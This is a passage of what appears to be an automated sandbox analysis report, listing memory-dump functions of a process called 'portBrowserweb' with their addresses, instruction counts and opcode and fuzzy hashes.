                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8571ef00353aadc5d3d779bbab2a16adb6c380dcfca039ffc8fbffdf01e7494
                                                                                              • Instruction ID: 9d71d4dd1dcfe5492e2382093ceaad9aff7f8d011dbc2078d4d391e02a167e2a
                                                                                              • Opcode Fuzzy Hash: d8571ef00353aadc5d3d779bbab2a16adb6c380dcfca039ffc8fbffdf01e7494
                                                                                              • Instruction Fuzzy Hash: 05C01211D2B40A82B400332A180A0BCA9005FC6618FE18032C42C50186D80DA28E03CE
                                                                                              Function 00007FFAAC480B18 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dcbed1991483c754386142d6157c9ef652e6faef00a335cf41a5cbd9853c6458
                                                                                              • Instruction ID: 6046f23a0983aebb95de4e38542e62331fb55a719c1bbd4b3c4dfdad8936279e
                                                                                              • Opcode Fuzzy Hash: dcbed1991483c754386142d6157c9ef652e6faef00a335cf41a5cbd9853c6458
                                                                                              • Instruction Fuzzy Hash: 05C04C305128198FDA44EB2DC98995476E0FB0E215BD501D0E40DCB171E66ADD95C745
                                                                                              Function 00007FFAAC866EDB Relevance: .0, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8849eb9cb6e50cf3010bdd05ce258bf67c2c624ca12ee6cffee74d73ae5e5f97
                                                                                              • Instruction ID: 0b2ff19aa58e6774f7ffa56935cc73b5286ab2427fda550df6e977db5f7ce646
                                                                                              • Opcode Fuzzy Hash: 8849eb9cb6e50cf3010bdd05ce258bf67c2c624ca12ee6cffee74d73ae5e5f97
                                                                                              • Instruction Fuzzy Hash: E5D09218A0E593C6F2698711812063AD5927F4E700E3084BEC09F418C2CD2DF84A6292
                                                                                              Function 00007FFAAC86C80B Relevance: .0, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 183a94bc241902a1e1332059234a9766b43e7704547d87c9f899a0b3a204fada
                                                                                              • Instruction ID: 619fb0dd154dade1669a8e273bc0582ba8e0e7d848b67ec391f8ded5b4532d56
                                                                                              • Opcode Fuzzy Hash: 183a94bc241902a1e1332059234a9766b43e7704547d87c9f899a0b3a204fada
                                                                                              • Instruction Fuzzy Hash: 99D09264A1F527C5F1388B514022279F5D0AF4B742F24C0BAC09F42AC19A1CF549A2C1
                                                                                              Function 00007FFAAC482D76 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5fc258960bce4a4d0bbbf609877e98c17fba922f548e94ce834569ca7d858afa
                                                                                              • Instruction ID: 3b183e5983680f5d61996aaa247091972751124eb9232fab5bfd1eed75c4ff4d
                                                                                              • Opcode Fuzzy Hash: 5fc258960bce4a4d0bbbf609877e98c17fba922f548e94ce834569ca7d858afa
                                                                                              • Instruction Fuzzy Hash: F1C08C41E0881653F248A328C415ABE08025B40254F644679E00FD62CACC0C5A0207CA
                                                                                              Function 00007FFAAC480540 Relevance: .0, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4783b11b931826f2739748290dbd55209787d3975a3e9121311fee6e1e0a39b
                                                                                              • Instruction ID: aad214e7371ee649bc65bcaab2ba402bb8d3805d317cd0dc626242c2adddea74
                                                                                              • Opcode Fuzzy Hash: a4783b11b931826f2739748290dbd55209787d3975a3e9121311fee6e1e0a39b
                                                                                              • Instruction Fuzzy Hash: B8B09220C9760A86F9283331484A074B050AB0660CFD045B5D42D40192E96E929987C6
                                                                                              Function 00007FFAAC86599C Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                                                              • Instruction ID: fe5e145efcc6a9b1db7b84a7567aeda4eac8aabbdeba5df0190f38a517750a9a
                                                                                              • Opcode Fuzzy Hash: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                                                              • Instruction Fuzzy Hash: 68C04C70609405CFFA90DB18C144A2976A0FF0A300F6140F4F00ECB5B1DA34FC059750
                                                                                              Function 00007FFAAC4806C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e4ad256f5442e79f2a4d1ca15e32a4765b11f0a1e9799c9211321962e71f73f3
                                                                                              • Instruction ID: a737e168b5310812bc17c81065e2f500c46cf9ecf037bc2298b7fc26548a9692
                                                                                              • Opcode Fuzzy Hash: e4ad256f5442e79f2a4d1ca15e32a4765b11f0a1e9799c9211321962e71f73f3
                                                                                              • Instruction Fuzzy Hash: CFB01220C6B40F46B404337B0C4B07478405F8610CFC14070D82D40282D84DA29D03CA
                                                                                              Function 00007FFAAC86BD51 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e496c4c0a1dc465c097b518753ae35b14d85710598dff18366a0efd5b3c66724
                                                                                              • Instruction ID: 85b5c9457bfde0cda7a5168fa70086232f5ce94de44298d45f7d40169b2d9646
                                                                                              • Opcode Fuzzy Hash: e496c4c0a1dc465c097b518753ae35b14d85710598dff18366a0efd5b3c66724
                                                                                              • Instruction Fuzzy Hash: D5B01200F0E20BC3B13106B00C800BCC0802B0F249F5085F0F11F4A1D3ED4CB80832D0
                                                                                              Function 00007FFAAC866421 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56bde1a2fff24d7daad81cc848070af4d8e891a4bc0d856deafc439e905d2b20
                                                                                              • Instruction ID: f24ff5ba6029c0120e121170c43ce7bf4cc79d2d09f5d5eb685bd774efe4e332
                                                                                              • Opcode Fuzzy Hash: 56bde1a2fff24d7daad81cc848070af4d8e891a4bc0d856deafc439e905d2b20
                                                                                              • Instruction Fuzzy Hash: 3DB01204F0E283D3F22002F4344203C80402F0F205E909AB0E20F651C3DC6CBC0812D0